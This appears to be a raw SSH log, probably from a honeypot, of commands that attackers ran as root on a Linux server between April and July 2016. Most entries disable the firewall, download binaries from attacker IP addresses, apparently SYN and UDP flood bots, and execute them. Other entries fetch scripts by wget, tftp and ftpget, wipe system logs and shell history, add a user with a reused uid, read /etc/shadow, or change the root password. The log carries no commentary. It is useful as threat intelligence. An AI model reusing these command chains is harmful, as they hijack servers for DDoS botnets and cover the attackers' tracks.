Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:81/121991;chmod 755 121991;./121991;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://14.29.47.121:81/121991
chmod 755 121991
./121991

From 121.12.173.62  5-Apr-2016 14:24:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/syn1991;chmod 777 syn1991;./syn1991;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/syn1991
chmod 777 syn1991
./syn1991

From 121.12.173.62  6-Apr-2016 00:45:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://119.147.115.117:88/ssd;chmod 777 ssd;./ssd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://119.147.115.117:88/ssd
chmod 777 ssd
./ssd

From 121.12.173.62  7-Apr-2016 18:09:41 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.173.62:10123/udp25000;chmod 755 udp25000;./udp25000;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.173.62:10123/udp25000
chmod 755 udp25000
./udp25000

From 213.147.166.55  8-Apr-2016 03:26:56 ssh2 root
w
last
cat /proc/cpuinfo
rproc
apt-get
apt-get install nano
apt-get install gcc
apt-get install gcc install gcc g install gcc
apt-get install wget
apt-get
apt-get install
apt-get install wget
apt-get install curl
curl
apt-get update
apt-get install alsa-utils
apt-get install update
yum
apt-get install yum
cd /
ls -a
cd
ls -a
cd /root
ls -a
cat .listing
cd /home
ls -a
cat /etc/paswd
cat /etc/pasws
cat /etc/passd
cat /etc/passwd
cat /etc/issue
uname -a
sudo su
su
cd
ls -a
cd /var/www
ls -a
ls -al
ls
cd /var/tmop
cd /var/tm
cd /var/tmp
ls
nano ip
nano ipcalc.pl
vi ipcalc.pl
apt-get install vi
ls
ls -a
ps -x
w
kill -9 22262
ls -a
ps -x
kill -9 22262
ps -x
killall -9 auth
reboot
restart
kill -9 -1
ps -x

From 213.147.166.55  8-Apr-2016 09:49:57 ssh2 root
w
uname -a
nproc
cat/p
cat /proc/cpuinfo
cd /var/tmp
ls -a
cat .bash_history
cat .mysql_history
cat .xauthdljiQQ
pwd
cd /&deV/shm
cd /
cd /dev/shm
ls -a
wget http://rekon.altervista.org/irc/bnc.tgz
tar zxvf bnc.tgz
rm -rf bnc.tgz
cd .bash
chmod +x *
wget http://rekon.altervista.org/irc/bnc.tgz
curl -O
wget 138.201.222.27/irc/bnc.tgz
wget -r
wget -rd
wget -O
wget datafresh.org/cartier.tgz
ftp

From 213.147.166.55  8-Apr-2016 14:43:01 ssh2 root
w
last
cat /proc/cpuinfo
rproc
apt-get
apt-get install nano
apt-get install gcc
apt-get install wget
apt-get
apt-get install
apt-get install wget
apt-get install curl
curl
apt-get update
apt-get install alsa-utils
apt-get install update
yum
apt-get install yum
cd /
ls -a
cd
ls -a
cd /root
ls -a
cat .listing
cd /home
ls -a
cat /etc/paswd
cat /etc/pasws
cat /etc/passd
cat /etc/passwd
cat /etc/issue
uname -a
sudo su
su
cd
ls -a
cd /var/www
ls -a
ls -al
ls
cd /var/tmop
cd /var/tm
cd /var/tmp
ls
nano ip
nano ipcalc.pl
vi ipcalc.pl
apt-get install vi
ls
ls -a
ps -x
w
kill -9 22262
ls -a
ps -x
kill -9 22262
ps -x
killall -9 auth
reboot
restart
kill -9 -1
ps -x

From 103.89.90.28  8-Apr-2016 19:36:05 ssh2 root
/usr/sbin/useradd -o -u 10 r/sbin/useradd -o -u 10
/usr/sbin/useradd -o -u 1000 uglyduck
useradd
cat /etc/shadow
cat /etc/shadows
wget
wget datafresh.org/cartier.tgz
ps -x
ps -A
kill -9 22244
sh
bash
reboot
restart
w
last
cd
ls -a
cd ..
ls -a
ls
cd nsmail
ls -a
ls

From 121.12.173.62  9-Apr-2016 01:12:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://14.29.47.121:88/xudp;chmod 777 xudp;./xudp;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://14.29.47.121:88/xudp
chmod 777 xudp
./xudp

From 121.12.173.62 13-Apr-2016 19:03:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/Linux-udp1991;chmod 755 Linux-udp1991;./Linux-udp1991;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188/Linux-udp1991
chmod 755 Linux-udp1991
./Linux-udp1991

From 121.12.173.62 14-Apr-2016 05:24:11 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://115.144.107.188/Linux-syn1991;chmod 777 Linux-syn1991;./Linux-syn1991;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://115.144.107.188/Linux-syn1991
chmod 777 Linux-syn1991
./Linux-syn1991

From 60.10.114.158 15-Apr-2016 03:01:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/ ;wget -c http://116.196.120.20:7800/syn;chmod 777 syn;setsid ./syn &>>ldevlnull;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp/
wget -c http://116.196.120.20:7800/syn
chmod 777 syn
setsid ./syn &>>ldevlnull

From 60.10.114.158 15-Apr-2016 12:47:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/;chmod 777 syn;setsid ./syn &>>ldevlnull;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp/
chmod 777 syn
setsid ./syn &>>ldevlnull

From 222.186.56.5 18-Apr-2016 12:53:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.161.141:81/123;chmod 777 123;./123;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.193.161.141:81/123
chmod 777 123
./123

From 222.186.56.5 19-Apr-2016 19:56:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.161.141:81/UDP_25;chmod 755 UDP_25;./UDP_25;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.193.161.141:81/UDP_25
chmod 755 UDP_25
./UDP_25

From 222.186.56.5 20-Apr-2016 06:17:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c 222.186.56.5:8080/duge_SYN;chmod 777 duge_SYN;./duge_SYN;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c 222.186.56.5:8080/duge_SYN
chmod 777 duge_SYN
./duge_SYN

From 5.189.139.2 20-Apr-2016 10:00:53 ssh2 root
Exec uname -a && cat /etc/issue
uname -a && cat /etc/issue

From 222.186.56.5 21-Apr-2016 13:20:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.161.141/bs;chmod 755 bs;./bs;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.193.161.141/bs
chmod 755 bs
./bs

From 222.186.56.5 21-Apr-2016 23:41:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:8080/duge_SYN;chmod 777 duge_SYN;./duge_SYN;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.56.5:8080/duge_SYN
chmod 777 duge_SYN
./duge_SYN

From 222.186.56.5 22-Apr-2016 10:02:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:8080/duge_SYN;chmod 755 duge_SYN;./duge_SYN;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.56.5:8080/duge_SYN
chmod 755 duge_SYN
./duge_SYN

From 222.186.58.136 25-Apr-2016 10:29:19 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.136:7716/NNZZT;chmod 777 NNZZT;./NNZZT;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.58.136:7716/NNZZT
chmod 777 NNZZT
./NNZZT

From 222.186.56.5 25-Apr-2016 20:50:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:81/duge_SYN;chmod 777 duge_SYN;./duge_SYN;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.56.5:81/duge_SYN
chmod 777 duge_SYN
./duge_SYN

From 222.186.56.5 26-Apr-2016 07:11:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:81/duge_SYN;chmod 755 duge_SYN;./duge_SYN;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.56.5:81/duge_SYN
chmod 755 duge_SYN
./duge_SYN

From 222.186.56.5 29-Apr-2016 07:38:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:8080/China1991;chmod 755 China1991;./China1991;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.56.5:8080/China1991
chmod 755 China1991
./China1991

From 222.186.56.5 29-Apr-2016 17:58:59 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:8080/duge_L24;chmod 755 duge_L24;./duge_L24;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.56.5:8080/duge_L24
chmod 755 duge_L24
./duge_L24

From 222.186.56.5 30-Apr-2016 14:40:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.5:8080/China1991;chmod 777 China1991;./China1991;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.56.5:8080/China1991
chmod 777 China1991
./China1991

From 222.186.56.5  1-May-2016 01:01:53 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.193.161.143:801/bbs;chmod 755 bbs;./bbs;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.193.161.143:801/bbs
chmod 755 bbs
./bbs

From 222.186.58.136  5-May-2016 08:31:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.136:373/NLUX;chmod 777 NLUX;./NLUX;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.58.136:373/NLUX
chmod 777 NLUX
./NLUX

From 138.59.211.27  6-May-2016 15:34:27 ssh2 root
Exec ls -al; du -h *; df -h;
ls -al
du -h *
df -h

From 222.186.34.203  7-May-2016 12:16:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/Someone915;chmod 777 Someone915;./Someone915;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.34.203:89/Someone915
chmod 777 Someone915
./Someone915

From 222.186.34.203  7-May-2016 22:37:21 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/Client;chmod 7777 Client;./Client;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.34.203:89/Client
chmod 7777 Client
./Client

From 222.186.34.203  8-May-2016 08:58:19 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/chinasyn;chmod 7777 chinasyn;./chinasyn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.34.203:89/chinasyn
chmod 7777 chinasyn
./chinasyn

From 222.186.34.203  8-May-2016 19:19:17 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.34.203:89/Someone915;chmod 755 Someone915;./Someone915;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.34.203:89/Someone915
chmod 755 Someone915
./Someone915

From 222.186.58.136  9-May-2016 16:01:13 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.58.136:374/NNTTZ;chmod 777 NNTTZ;./NNTTZ;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.58.136:374/NNTTZ
chmod 777 NNTTZ
./NNTTZ

From 222.186.56.70 10-May-2016 12:43:09 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.72:889/Jwebl;chmod 755 Jwebl;./Jwebl;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.21.72:889/Jwebl
chmod 755 Jwebl
./Jwebl

From 176.223.34.52 10-May-2016 23:04:07 ssh2 root
w
uname -a
free -m
os x
ps x
rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog
touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog
unset HISTFILE
unset HISTSAVE
unset HISTLOG
history -n
unset WATCH
export HISTFILE=/dev/null
history -c
w
exit

From 163.172.154.75 12-May-2016 04:39:01 ssh2 root
Exec uname -a ; cat /etc/issue ; uptime
uname -a
cat /etc/issue
uptime

From 222.186.21.170 14-May-2016 20:12:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.170:389/TTMX;chmod 777 TTMX;./TTMX;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.21.170:389/TTMX
chmod 777 TTMX
./TTMX

From 222.186.21.170 15-May-2016 06:33:47 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.170:389/2916;chmod 777 2916;./2916;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.21.170:389/2916
chmod 777 2916
./2916

From 222.186.21.170 15-May-2016 16:54:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.21.170:389/2915;chmod 777 2915;./2915;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.21.170:389/2915
chmod 777 2915
./2915

From 61.216.13.188 18-May-2016 07:00:33 ssh2 root
ls
ps -ef
wget http://117.18.4.70:7777/dafa2016 chmod +x dafa2016 ./dafa2016 chattr +i
ps -ef

From 219.132.178.139 18-May-2016 17:21:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.97.215.31:8080/dad;chmod 777 dad;./dad;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.97.215.31:8080/dad
chmod 777 dad
./dad

From 39.109.4.162 23-May-2016 21:33:07 ssh2 root
Exec wget -P/root/ http://39.109.4.162/escds
wget -P/root/ http://39.109.4.162/escds

From 39.109.4.162 24-May-2016 07:54:05 ssh2 root
Exec /root/escds
/root/escds

From 174.138.14.128 24-May-2016 14:36:05 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.202.235.18/8UsA.sh; curl -O http://82.202.235.18/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 82.202.235.18 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 82.202.235.18; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 82.202.235.18 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf
cd /tmp || cd /var/run || cd /mnt
wget http://82.202.235.18/8UsA.sh
curl -O http://82.202.235.18/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 82.202.235.18 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 82.202.235.18
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf

From 27.255.81.37 24-May-2016 18:15:03 ssh2 root
uname -a
ps -ef
passwd
sfdgfghkjlkhjghfgdfsdfdgfjhhfgdfdgh

From 27.255.81.38 25-May-2016 04:36:01 ssh2 root
ps -ef
passwd
dsfdsgfhjghkjlkhjgfgdfdssfdgfhgfdgf

From 51.15.193.245 27-May-2016 10:59:01 ssh2 root
Exec : cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://82.202.235.18/8UsA.sh; curl -O http://82.202.235.18/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 82.202.235.18 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 82.202.235.18; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 82.202.235.18 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf
: cd /tmp || cd /var/run || cd
wget http://82.202.235.18/8UsA.sh
curl -O http://82.202.235.18/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 82.202.235.18 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 82.202.235.18
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf

From 222.186.21.72 27-May-2016 18:41:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.7.70:88/Liao;chmod 777 Liao;./Liao;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://123.249.7.70:88/Liao
chmod 777 Liao
./Liao

From 222.186.21.72 28-May-2016 05:02:47 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.7.70:88/honest;chmod 777 honest;./honest;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://123.249.7.70:88/honest
chmod 777 honest
./honest

From 222.186.21.72 28-May-2016 15:23:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://123.249.7.70:88/honest;chmod 755 honest;./honest;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://123.249.7.70:88/honest
chmod 755 honest
./honest

From 222.186.21.72 29-May-2016 01:44:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.170.45:88/honest;chmod 777 honest;./honest;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.170.45:88/honest
chmod 777 honest
./honest

From 103.106.98.139 29-May-2016 02:03:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp/;rm -rf xm.sh;wget -c http://116.196.120.20:7800/xm.sh;chmod 777 xm.sh;sh xm.sh;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
cd /tmp/
rm -rf xm.sh
wget -c http://116.196.120.20:7800/xm.sh
chmod 777 xm.sh
sh xm.sh

From 39.79.106.56 29-May-2016 22:26:39 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://45.34.1.216:858/vip -P /tmp/;chmod 0777 /tmp/vip;/tmp/vip;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://45.34.1.216:858/vip -P /tmp/
chmod 0777 /tmp/vip
/tmp/vip

From 39.79.106.56 30-May-2016 19:08:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://45.34.1.216:858/synn -P /tmp/;chmod 0777 /tmp/synn;/tmp/synn;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://45.34.1.216:858/synn -P /tmp/
chmod 0777 /tmp/synn
/tmp/synn

From 39.79.106.56 31-May-2016 05:29:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://45.34.1.216:858/ip -P /tmp/;chmod 0777 /tmp/ip;/tmp/ip;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://45.34.1.216:858/ip -P /tmp/
chmod 0777 /tmp/ip
/tmp/ip

From 39.79.106.56 31-May-2016 15:50:31 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget http://45.34.1.216:858/app -P /tmp/;chmod 0777 /tmp/app;/tmp/app;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget http://45.34.1.216:858/app -P /tmp/
chmod 0777 /tmp/app
/tmp/app

From 167.114.249.132 31-May-2016 17:33:25 ssh2 root
Exec cat /etc/issue && uname -a
cat /etc/issue && uname -a

From 79.137.39.227  3-Jun-2016 23:42:29 ssh2 root
Exec uname -a ; uptime -p 
uname -a
uptime -p

From 211.104.160.3  4-Jun-2016 12:59:13 ssh2 root
ps -ef
wget http://118.184.28.130:7777/2016ttfacai chmod +x 2016ttfacai ./2016ttfacai chattr +i
ps -ef

From 23.238.184.217  5-Jun-2016 20:02:07 ssh2 root
Exec wget http://118.184.28.130:7777/tiantianniu
wget http://118.184.28.130:7777/tiantianniu

From 121.12.127.125  7-Jun-2016 03:05:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.61.254.103:5198/breeb;chmod 777 breeb;./breeb;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://183.61.254.103:5198/breeb
chmod 777 breeb
./breeb

From 222.186.56.12  7-Jun-2016 13:25:59 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.56.12:88/ming;chmod 777 ming;./ming;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://222.186.56.12:88/ming
chmod 777 ming
./ming

From 218.93.208.245  8-Jun-2016 10:07:55 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://218.93.208.245:5198/breeb;chmod 777 breeb;./breeb;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://218.93.208.245:5198/breeb
chmod 777 breeb
./breeb

From 27.153.31.117  8-Jun-2016 20:28:53 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://118.184.30.231:5198/shu;chmod 777 shu;./shu;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://118.184.30.231:5198/shu
chmod 777 shu
./shu

From 27.153.31.117  9-Jun-2016 17:10:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://122.0.80.183:5198/breeb;chmod 77
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://122.0.80.183:5198/breeb
chmod 77

From 121.12.127.125 10-Jun-2016 13:52:45 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://121.12.127.125:5198/rwd;chmod 777 rwd;./rwd;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://121.12.127.125:5198/rwd
chmod 777 rwd
./rwd

From 221.203.142.133 11-Jun-2016 00:13:43 ssh2 root
Exec (uname -a)
(uname -a)

From 174.139.14.34 13-Jun-2016 03:58:33 ssh2 root
passwd
dsfdhjlkljkjhghfgdfdgjhkfdgfhghfgfg

From 27.151.173.32 14-Jun-2016 21:22:25 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop

From 23.238.184.217 20-Jun-2016 11:54:59 ssh2 root
Exec wget http://43.240.14.228:7777/niuniu
wget http://43.240.14.228:7777/niuniu

From 123.206.23.127 22-Jun-2016 05:18:51 ssh2 root
ifconfig
wget -qO- bench.sh | bash
netstat -antp
apt-get
yum
apt-get update
sudo apt-get update
last
lastb
ls
cd
cd /
ls
cat /proxy.doc

From 103.20.249.191 22-Jun-2016 15:39:49 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://122.0.80.183:5198/breeb;chmod 777 breeb;./breeb;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://122.0.80.183:5198/breeb
chmod 777 breeb
./breeb

From 222.186.21.76 28-Jun-2016 16:33:21 ssh2 root
wget http://139.196.191.181:81/1231.rar chmod 777 1231.rar ./1231.rar &

From 123.146.82.23  2-Jul-2016 03:21:05 ssh2 root
wget http://139.196.191.181:81/sa2 chmod 777 sa2 ./sa2 &
chmod 777 1231.rar ./1231.rar &

From 222.186.21.76  2-Jul-2016 13:42:03 ssh2 root
wget http://139.196.191.181:81/1231.rar chmod 777 1231.rar ./1231.rar &
wget http://139.196.191.181:81/sa2 chmod 777 sa2 ./sa2 &

From 222.186.21.76  3-Jul-2016 20:44:57 ssh2 root
wget http://139.196.191.181:81/123.rar chmod 777 123.rar ./123.rar &

From 222.186.21.76  4-Jul-2016 07:05:55 ssh2 root
wget http://syna.f3322.net:81/123.rar chmod 777 123.rar ./123.rar &

From 86.27.91.145  4-Jul-2016 22:08:37 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://159.89.52.13/ssh.sh; curl -O http://159.89.52.13/ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp 159.89.52.13 -c get ssh.sh; chmod 777 ssh.sh; sh ssh.sh; tftp -r ssh2.sh -g 159.89.52.13; chmod 777 ssh2.sh; sh ssh2.sh; ftpget -v -u anonymous -p anonymous -P 21 159.89.52.13 ssh1.sh ssh1.sh; sh ssh1.sh; rm -rf ssh.sh ssh.sh ssh2.sh ssh1.sh; rm -rf *
